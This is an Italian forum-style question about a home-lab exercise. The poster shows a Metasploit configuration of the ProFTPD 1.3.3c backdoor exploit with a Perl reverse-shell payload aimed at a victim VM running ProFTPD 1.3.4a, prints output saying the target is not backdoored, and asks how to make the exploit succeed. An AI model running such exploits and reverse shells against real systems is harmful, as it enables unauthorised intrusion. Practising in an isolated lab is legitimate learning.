Volevo fare pratica con il sistema di exploiting usando backdoor proftpd. Uso l'exploit proftpd_133c_backdoor e il payload reverse_perl. Ho imparato su come sfruttare questo link, link .
La macchina virtuale del mio aggressore è 192.168.19.2. La mia macchina virtuale vittima è 192.168.19.5 (proftpd 1.3.4a.) La porta aperta sulla vittima è 21 e il nome della versione è proFTPD 1.3.4a
Ecco la configurazione dell'exploit e del payload qui sotto.
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.19.5 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.19.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
quindi l'ho sfruttato comunque non dichiara backdoor. il risultato è mostrato sotto.
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.19.2:4444
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.
Quali sono le soluzioni per realizzare questo exploit? e come si fa? Per favore aiutami. grazie.